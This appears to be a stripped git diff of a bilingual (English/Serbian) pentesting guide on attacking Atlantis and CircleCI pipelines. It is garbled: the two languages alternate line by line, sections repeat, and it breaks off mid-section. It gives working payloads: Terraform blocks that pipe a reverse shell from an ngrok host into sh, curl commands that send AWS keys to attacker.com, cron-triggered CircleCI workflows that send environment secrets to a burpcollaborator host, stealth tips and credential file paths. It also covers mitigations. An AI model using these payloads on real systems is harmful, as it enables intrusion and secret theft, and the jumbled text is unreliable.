> Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allow_custom_workflows` postavljena na **True**, workflow-i se mogu **specificirati** u **`atlantis.yaml`** datoteci svakog repozitorijuma. Takođe je potencijalno potrebno da **`allowed_overrides`** takođe specificira **`workflow`** da **prepiše workflow** koji će se koristiti.\
> Ovo će u osnovi dati **RCE u Atlantis server svakom korisniku koji može pristupiti tom repozitorijumu**.
>
> ```yaml
> # atlantis.yaml
@@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor
**Conftest Policy Checking**
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
Atlantis podržava pokretanje **server-side** [**conftest**](https://www.conftest.dev/) **politika** protiv izlaza plana. Uobičajeni slučajevi korišćenja ovog koraka uključuju:
- Denying usage of a list of modules
- Asserting attributes of a resource at creation time
- Catching unintentional resource deletions
- Preventing security risks (ie. exposing secure ports to the public)
- Odbijanje korišćenja liste modula.
- Potvrđivanje atributa resursa u trenutku kreiranja.
- Hvatanje nenamernih brisanja resursa.
- Sprečavanje bezbednosnih rizika (npr. izlaganje sigurnih portova javnosti).
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
Možete proveriti kako to konfigurisati u [**dokumentaciji**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis Commands
[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
[**U dokumentaciji**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) možete pronaći opcije koje možete koristiti za pokretanje Atlantisa:
```bash
# Get help
atlantis help
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
### Attacks
### Napadi
> [!WARNING]
> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
You can fix it by running:
> Ako tokom eksploatacije naiđete na ovu **grešku**: `Error: Error acquiring the state lock`
Možete to popraviti pokretanjem:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
#### Atlantis plan RCE - Modifikacija konfiguracije u novom PR-u
#### Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
Ako imate pristup za pisanje u repozitorijum, moći ćete da kreirate novu granu i generišete PR. Ako možete **izvršiti `atlantis plan`** (ili možda se automatski izvršava) **moći ćete da RCE unutar Atlantis servera**.
Možete to uraditi tako što ćete [**naterati Atlantis da učita spoljašnji izvor podataka**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Samo stavite payload kao što je sledeći u `main.tf` datoteku:
```json
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**Tajni napad**
**Stealthier Attack**
You can perform this attack even in a **stealthier way**, by following this suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
Možete izvesti ovaj napad čak i na **tajniji način**, prateći ove sugestije:
- Umesto da direktno dodate rev shell u terraform datoteku, možete **učitati spoljašnji resurs** koji sadrži rev shell:
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
Možete pronaći rev shell kod na [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
- U spoljnim resursima, koristite **ref** funkciju da sakrijete **terraform rev shell kod u grani** unutar repozitorijuma, nešto poput: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- **Umesto** kreiranja **PR za master** da pokrenete Atlantis, **napravite 2 grane** (test1 i test2) i kreirajte **PR od jedne do druge**. Kada završite napad, samo **uklonite PR i grane**.
#### Atlantis plan Secrets Dump
You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
Možete **dumpovati tajne koje koristi terraform** pokretanjem `atlantis plan` (`terraform plan`) tako što ćete staviti nešto poput ovoga u terraform datoteku:
```json
output "dotoken" {
value = nonsensitive(var.do_token)
value = nonsensitive(var.do_token)
}
```
#### Atlantis apply RCE - Modifikacija konfiguracije u novom PR-u
#### Atlantis apply RCE - Config modification in new PR
Ako imate pristup za pisanje u repozitorijum, moći ćete da kreirate novu granu i generišete PR. Ako možete **izvršiti `atlantis apply`, moći ćete da RCE unutar Atlantis servera**.
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
Međutim, obično ćete morati da zaobiđete neke zaštite:
However, you will usually need to bypass some protections:
- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends in the `main.tf` file:
- **Mergeable**: Ako je ova zaštita postavljena u Atlantis-u, možete pokrenuti **`atlantis apply` samo ako je PR spojiv** (što znači da zaštita grane mora biti zaobiđena).
- Proverite potencijalne [**zaštite grane zaobilaženja**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
- **Approved**: Ako je ova zaštita postavljena u Atlantis-u, neki **drugi korisnik mora odobriti PR** pre nego što možete pokrenuti `atlantis apply`
- Po defaultu možete zloupotrebiti [**Gitbot token da zaobiđete ovu zaštitu**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
Pokretanje **`terraform apply` na malicioznom Terraform fajlu sa** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
Samo treba da se pobrinete da neki payload poput sledećih završi u `main.tf` fajlu:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
Sledite **preporukama iz prethodne tehnike** da izvršite ovaj napad na **diskretniji način**.
#### Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
Kada pokrećete `atlantis plan` ili `atlantis apply`, terraform se pokreće ispod, možete proslediti komande terraformu iz atlantisa komentarišući nešto poput:
```bash
atlantis plan -- <terraform commands>
atlantis plan -- -h #Get terraform plan help
@@ -256,18 +243,17 @@ atlantis plan -- -h #Get terraform plan help
atlantis apply -- <terraform commands>
atlantis apply -- -h #Get terraform apply help
```
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
This possibility was mentioned in a previous section:
Pokretanje **malicious custom build commands** specificiranih u `atlantis.yaml` datoteci. Atlantis koristi `atlantis.yaml` datoteku iz grane pull request-a, **ne** iz `master`.\
Ova mogućnost je pomenuta u prethodnom odeljku:
> [!CAUTION]
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
> Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allow_custom_workflows` postavljena na **True**, radni tokovi mogu biti **specificirani** u **`atlantis.yaml`** datoteci svake repozitorije. Takođe je potencijalno potrebno da **`allowed_overrides`** takođe specificira **`workflow`** da **prepiše radni tok** koji će se koristiti.
>
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
> Ovo će u osnovi dati **RCE na Atlantis serveru bilo kojem korisniku koji može pristupiti toj repozitoriji**.
>
> ```yaml
> # atlantis.yaml
@@ -288,97 +274,95 @@ This possibility was mentioned in a previous section:
#### Bypass plan/apply protections
If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
Ako je [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) zastavica `allowed_overrides` _konfigurisana_ sa `apply_requirements`, moguće je da repozitorija **modifikuje plan/apply zaštite da ih zaobiđe**.
```yaml
repos:
- id: /.*/
apply_requirements: []
- id: /.*/
apply_requirements: []
```
#### PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
Ako neko pošalje **`atlantis plan/apply` komentare na vašim validnim pull zahtevima,** to će uzrokovati da terraform radi kada to ne želite.
Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
Štaviše, ako nemate podešeno u **zaštiti grane** da traži da se **ponovo proceni** svaki PR kada se **novi commit pošalje** na njega, neko bi mogao da **napisuje zloćudne konfiguracije** (proverite prethodne scenarije) u terraform konfiguraciji, pokrene `atlantis plan/apply` i dobije RCE.
This is the **setting** in Github branch protections:
Ovo je **podešavanje** u Github zaštitama grana:
![](<../images/image (216).png>)
#### Webhook Secret
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
Ako uspete da **ukradete webhook secret** koji se koristi ili ako **nema webhook secret** koji se koristi, mogli biste **pozvati Atlantis webhook** i **izvršiti atlantis komande** direktno.
#### Bitbucket
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
Bitbucket Cloud **ne podržava webhook secrets**. Ovo bi moglo omogućiti napadačima da **lažiraju zahteve iz Bitbucket-a**. Osigurajte da dozvoljavate samo Bitbucket IP adrese.
- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
- To znači da bi **napadač** mogao da napravi **lažne zahteve ka Atlantis-u** koji izgledaju kao da dolaze iz Bitbucket-a.
- Ako specificirate `--repo-allowlist`, onda bi mogli samo da lažiraju zahteve koji se odnose na te repozitorijume, tako da bi najveća šteta koju bi mogli da naprave bila planiranje/aplikacija na vašim repozitorijumima.
- Da biste to sprečili, dozvolite [IP adrese Bitbucket-a](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (vidi Izlazne IPv4 adrese).
### Post-Exploitation
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
Ako ste uspeli da dobijete pristup serveru ili barem ste dobili LFI, postoje neke zanimljive stvari koje biste trebali pokušati da pročitate:
- `/home/atlantis/.git-credentials` Contains vcs access credentials
- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
- Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
- `/proc/1/environ` Env variables
- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
- `/home/atlantis/.git-credentials` Sadrži vcs pristupne akreditive
- `/atlantis-data/atlantis.db` Sadrži vcs pristupne akreditive sa više informacija
- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stanje datoteke
- Primer: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
- `/proc/1/environ` Env varijable
- `/proc/[2-20]/cmdline` Cmd linija `atlantis server` (može sadržati osetljive podatke)
### Mitigations
#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
Zato što bilo ko može komentarisati na javnim pull zahtevima, čak i sa svim dostupnim bezbednosnim mitigacijama, i dalje je opasno pokretati Atlantis na javnim repozitorijumima bez pravilne konfiguracije bezbednosnih podešavanja.
#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
Ako radite na javnom repozitorijumu (što nije preporučljivo, vidi iznad), ne biste trebali postaviti `--allow-fork-prs` (podrazumevano je false) jer bilo ko može otvoriti pull zahtev iz svog fork-a ka vašem repozitorijumu.
#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
Atlantis zahteva da navedete listu dozvoljenih repozitorijuma sa kojih će prihvatati webhooks putem `--repo-allowlist` zastavice. Na primer:
- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
- Specifični repozitorijumi: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
- Cela vaša organizacija: `--repo-allowlist=github.com/runatlantis/*`
- Svaki repozitorijum u vašem GitHub Enterprise instalaciji: `--repo-allowlist=github.yourcompany.com/*`
- Svi repozitorijumi: `--repo-allowlist=*`. Korisno kada ste u zaštićenoj mreži, ali opasno bez takođe postavljenog webhook secret-a.
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
Ova zastavica osigurava da vaša Atlantis instalacija nije korišćena sa repozitorijumima koje ne kontrolišete. Vidi `atlantis server --help` za više detalja.
#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
Ako su napadači koji šalju pull zahteve sa zloćudnim Terraform kodom u vašem modelu pretnje, onda morate biti svesni da odobrenja za `terraform apply` nisu dovoljna. Moguće je pokrenuti zloćudni kod u `terraform plan` koristeći [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) ili specificirajući zloćudnog provajdera. Ovaj kod bi mogao da exfiltrira vaše akreditive.
To prevent this, you could:
Da biste to sprečili, mogli biste:
1. Bake providers into the Atlantis image or host and deny egress in production.
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
1. Ugraditi provajdere u Atlantis sliku ili hostovati i odbiti izlaz u produkciji.
2. Implementirati protokol za registraciju provajdera interno i odbiti javni izlaz, tako da kontrolišete ko ima pristup za pisanje u registru.
3. Izmeniti vašu [server-side repo konfiguraciju](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` korak da validira upotrebu zabranjenih provajdera ili data source-ova ili PR-ova od neodobrenih korisnika. Takođe možete dodati dodatnu validaciju u ovom trenutku, npr. zahtevajući "thumbs-up" na PR pre nego što dozvolite da `plan` nastavi. Conftest bi mogao biti od pomoći ovde.
#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
Atlantis bi trebao da se pokreće sa Webhook secret-ima postavljenim putem `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` varijabli okruženja. Čak i sa postavljenom `--repo-allowlist` zastavicom, bez webhook secret-a, napadači bi mogli da šalju zahteve ka Atlantis-u predstavljajući se kao repozitorijum koji je na listi dozvoljenih. Webhook secrets osiguravaju da webhook zahtevi zapravo dolaze od vašeg VCS provajdera (GitHub ili GitLab).
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
Ako koristite Azure DevOps, umesto webhook secret-a dodajte osnovno korisničko ime i lozinku.
#### Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
Azure DevOps podržava slanje osnovnog autentifikacionog header-a u svim webhook događajima. Ovo zahteva korišćenje HTTPS URL-a za vašu lokaciju webhook-a.
#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
Ako koristite webhook secrets, ali je vaš saobraćaj preko HTTP-a, tada bi webhook secrets mogli biti ukradeni. Omogućite SSL/HTTPS koristeći `--ssl-cert-file` i `--ssl-key-file` zastavice.
#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
Veoma se preporučuje omogućiti autentifikaciju u web servisu. Omogućite BasicAuth koristeći `--web-basic-auth=true` i postavite korisničko ime i lozinku koristeći `--web-username=yourUsername` i `--web-password=yourPassword` zastavice.
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
Takođe možete proslediti ovo kao varijable okruženja `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` i `ATLANTIS_WEB_PASSWORD=yourPassword`.
### References
@@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}

298
src/pentesting-ci-cd/circleci-security.md
View File

@@ -4,256 +4,232 @@
### Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) je platforma za kontinuiranu integraciju gde možete **definisati šablone** koji ukazuju šta želite da uradi sa nekim kodom i kada to da uradi. Na ovaj način možete **automatizovati testiranje** ili **implementacije** direktno **iz glavne grane vašeg repozitorijuma** na primer.
### Permissions
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
**CircleCI** **nasleđuje dozvole** sa github-a i bitbucket-a vezane za **nalog** koji se prijavljuje.\
U svojim testiranjima proverio sam da, sve dok imate **dozvole za pisanje nad repozitorijumom na github-u**, moći ćete da **upravljate postavkama projekta u CircleCI** (postavite nove ssh ključeve, dobijete api ključeve projekta, kreirate nove grane sa novim CircleCI konfiguracijama...).
However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
Međutim, potrebno je da budete **admin repozitorijuma** kako biste **pretvorili repozitorijum u CircleCI projekat**.
### Env Variables & Secrets
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
Prema [**dokumentaciji**](https://circleci.com/docs/2.0/env-vars/) postoje različiti načini da se **učitaju vrednosti u promenljive okruženja** unutar radnog toka.
#### Built-in env variables
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
Svaki kontejner koji pokreće CircleCI uvek će imati [**specifične env varijable definisane u dokumentaciji**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) kao što su `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` ili `CIRCLE_USERNAME`.
#### Clear text
You can declare them in clear text inside a **command**:
Možete ih deklarisati u čistom tekstu unutar **komande**:
```yaml
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
```
You can declare them in clear text inside the **run environment**:
Možete ih deklarisati u čistom tekstu unutar **run environment**:
```yaml
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
```
You can declare them in clear text inside the **build-job environment**:
Možete ih deklarisati u čistom tekstu unutar **build-job environment**:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
You can declare them in clear text inside the **environment of a container**:
Možete ih deklarisati u čistom tekstu unutar **okruženja kontejnera**:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
#### Tajne informacije projekta
#### Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
Ovo su **tajne** koje će biti **pristupačne** samo **projektu** (kroz **bilo koju granu**).\
Možete ih videti **deklarisane na** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
![](<../images/image (129).png>)
> [!CAUTION]
> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
> Funkcionalnost "**Import Variables**" omogućava **uvoz varijabli iz drugih projekata** u ovaj.
#### Context Secrets
#### Tajne informacije konteksta
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
Ovo su tajne koje su **šire organizacije**. Po **defaultu, svaka repo** će moći da **pristupi bilo kojoj tajni** koja je ovde smeštena:
![](<../images/image (123).png>)
> [!TIP]
> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
> Ipak, imajte na umu da se može **izabrati drugačija grupa** (umesto svih članova) kako bi se **pristup tajnama dao samo određenim osobama**.\
> Ovo je trenutno jedan od najboljih načina da se **poveća sigurnost tajni**, da se ne dozvoli svima da im pristupaju, već samo nekim ljudima.
### Attacks
### Napadi
#### Search Clear Text Secrets
#### Pretraga tajni u čistom tekstu
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
Ako imate **pristup VCS-u** (kao što je github), proverite datoteku `.circleci/config.yml` svake **repo na svakoj grani** i **pretražite** potencijalne **tajne u čistom tekstu** koje su tamo smeštene.
#### Secret Env Vars & Context enumeration
#### Tajne varijable okruženja i enumeracija konteksta
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
Proverom koda možete pronaći **sva imena tajni** koja se koriste u svakoj `.circleci/config.yml` datoteci. Takođe možete dobiti **imena konteksta** iz tih datoteka ili ih proveriti u web konzoli: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
#### Exfiltrate Project secrets
#### Ekstrakcija tajni projekta
> [!WARNING]
> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
> Da biste **ekstrahovali SVE** tajne projekta i konteksta, **samo** treba da imate **WRITE** pristup **samo 1 repo** u celoj github organizaciji (_i vaš nalog mora imati pristup kontekstima, ali po defaultu svako može pristupiti svakom kontekstu_).
> [!CAUTION]
> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
> Funkcionalnost "**Import Variables**" omogućava **uvoz varijabli iz drugih projekata** u ovaj. Stoga, napadač bi mogao **uvoziti sve projektne varijable iz svih repo** i zatim **ekstrahovati sve njih zajedno**.
Sve tajne projekta su uvek postavljene u env poslova, tako da samo pozivanje env i obfuskacija u base64 će ekstrahovati tajne u **web log konzoli radnih tokova**:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
exfil-env-workflow:
jobs:
- exfil-env
```
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
Ako **nemate pristup web konzoli** ali imate **pristup repozitorijumu** i znate da se koristi CircleCI, možete jednostavno **napraviti radni tok** koji se **pokreće svake minute** i koji **izvlači tajne na eksternu adresu**:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
```
#### Ekstraktovanje Tajni Konteksta
#### Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets):
Morate **navesti ime konteksta** (ovo će takođe ekstraktovati tajne projekta):
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
```
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
